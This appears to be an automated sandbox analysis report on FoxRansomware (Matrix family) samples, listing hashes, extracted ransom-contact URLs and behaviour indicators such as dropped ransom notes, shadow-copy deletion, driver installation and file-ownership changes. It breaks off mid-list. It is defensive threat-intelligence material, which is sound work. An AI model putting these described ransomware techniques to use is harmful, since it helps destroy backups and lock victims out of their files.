Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
184s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3308111660-3636268597-2291490419-1000\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Google\Update\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\KNIV5ME6\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Documents\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\More Games\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Solitaire\en-US\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Minesweeper\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Minesweeper\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 10 2872 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS uSDT8H9y64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" uSDT8H9y64.exe -
Executes dropped EXE 59 IoCs
pid Process 2580 NWgTwPHO.exe 3280 uSDT8H9y.exe 3308 uSDT8H9y64.exe 3068 uSDT8H9y.exe 3224 uSDT8H9y.exe 3324 uSDT8H9y.exe 2832 uSDT8H9y.exe 3776 uSDT8H9y.exe 3808 uSDT8H9y.exe 2884 uSDT8H9y.exe 1356 uSDT8H9y.exe 3936 uSDT8H9y.exe 3912 uSDT8H9y.exe 3136 uSDT8H9y.exe 3124 uSDT8H9y.exe 1356 uSDT8H9y.exe 1408 uSDT8H9y.exe 2528 uSDT8H9y.exe 2952 uSDT8H9y.exe 3800 uSDT8H9y.exe 2740 uSDT8H9y.exe 1680 uSDT8H9y.exe 2680 uSDT8H9y.exe 2856 uSDT8H9y.exe 3140 uSDT8H9y.exe 3220 uSDT8H9y.exe 2152 uSDT8H9y.exe 3036 uSDT8H9y.exe 3452 uSDT8H9y.exe 3376 uSDT8H9y.exe 3664 uSDT8H9y.exe 3416 uSDT8H9y.exe 1212 uSDT8H9y.exe 2912 uSDT8H9y.exe 3644 uSDT8H9y.exe 4028 uSDT8H9y.exe 3184 uSDT8H9y.exe 1756 uSDT8H9y.exe 1560 uSDT8H9y.exe 3448 uSDT8H9y.exe 3648 uSDT8H9y.exe 3048 uSDT8H9y.exe 2640 uSDT8H9y.exe 2428 uSDT8H9y.exe 664 uSDT8H9y.exe 1708 uSDT8H9y.exe 1732 uSDT8H9y.exe 3616 uSDT8H9y.exe 2688 uSDT8H9y.exe 596 uSDT8H9y.exe 2260 uSDT8H9y.exe 3684 uSDT8H9y.exe 576 uSDT8H9y.exe 1048 uSDT8H9y.exe 3412 uSDT8H9y.exe 1568 uSDT8H9y.exe 4032 uSDT8H9y.exe 1948 uSDT8H9y.exe 2788 uSDT8H9y.exe -
Loads dropped DLL 60 IoCs
pid Process 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 1072 cmd.exe 3280 uSDT8H9y.exe 3092 cmd.exe 3956 cmd.exe 3300 cmd.exe 2028 cmd.exe 3768 cmd.exe 1728 cmd.exe 2088 cmd.exe 1872 cmd.exe 3940 cmd.exe 2168 cmd.exe 3104 cmd.exe 3872 cmd.exe 3000 cmd.exe 3080 cmd.exe 2188 cmd.exe 3484 cmd.exe 3776 cmd.exe 3520 cmd.exe 328 cmd.exe 2424 cmd.exe 756 cmd.exe 544 cmd.exe 3064 cmd.exe 3872 cmd.exe 1608 cmd.exe 3272 cmd.exe 3592 cmd.exe 868 cmd.exe 2244 cmd.exe 1592 cmd.exe 2764 cmd.exe 3692 cmd.exe 2740 cmd.exe 268 cmd.exe 616 cmd.exe 3164 cmd.exe 2964 cmd.exe 3568 cmd.exe 2888 cmd.exe 952 cmd.exe 2624 cmd.exe 548 cmd.exe 3832 cmd.exe 3432 cmd.exe 3724 cmd.exe 2788 cmd.exe 1208 cmd.exe 4020 cmd.exe 876 cmd.exe 3604 cmd.exe 2972 cmd.exe 2452 cmd.exe 3184 cmd.exe 2068 cmd.exe 300 cmd.exe 2060 cmd.exe -
Modifies file permissions 1 TTPs 29 IoCs
pid Process 1624 takeown.exe 616 takeown.exe 2984 takeown.exe 344 takeown.exe 3288 takeown.exe 3152 takeown.exe 3996 takeown.exe 748 takeown.exe 548 takeown.exe 1560 takeown.exe 2088 takeown.exe 2068 takeown.exe 1704 takeown.exe 3760 takeown.exe 3212 takeown.exe 1692 takeown.exe 3212 takeown.exe 1940 takeown.exe 3244 takeown.exe 616 takeown.exe 3728 takeown.exe 2388 takeown.exe 3780 takeown.exe 1568 takeown.exe 2372 takeown.exe 3672 takeown.exe 748 takeown.exe 3560 takeown.exe 3616 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/files/0x0005000000019469-2121.dat upx behavioral5/memory/3280-2409-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1072-2249-0x0000000000250000-0x00000000002C7000-memory.dmp upx behavioral5/files/0x0005000000019469-2991.dat upx behavioral5/memory/3068-2988-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3224-2993-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3324-3053-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3324-3054-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2832-3058-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3776-3295-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3808-3300-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1728-3298-0x0000000000410000-0x0000000000487000-memory.dmp upx behavioral5/memory/2884-3560-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1356-3563-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3936-3877-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2168-3880-0x0000000000370000-0x00000000003E7000-memory.dmp upx behavioral5/memory/3912-3882-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3776-4003-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3136-4004-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3124-4008-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3124-4007-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3000-4071-0x0000000000230000-0x00000000002A7000-memory.dmp upx behavioral5/memory/1356-4073-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1408-4076-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2528-4304-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2528-4303-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2952-4308-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3800-4387-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2740-4391-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1680-4394-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2680-4397-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2856-4430-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3140-4433-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3220-4452-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3220-4451-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2152-4455-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3036-4470-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3452-4544-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3376-4564-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3664-4565-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3416-4655-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1212-4693-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2912-4911-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3644-5129-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4028-5440-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3184-5452-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1756-5492-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1560-5494-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3448-5694-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3648-5695-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3048-5747-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2640-5750-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/664-6579-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2428-6406-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1708-6777-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3432-6780-0x0000000000420000-0x0000000000497000-memory.dmp upx behavioral5/memory/1732-6781-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3616-6785-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2688-6787-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/596-7386-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2260-7586-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3684-8186-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/576-8189-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3616-8193-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\H48RL54X\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JRZ5JIWD\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\KNIV5ME6\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\5GBYI9E8\desktop.ini 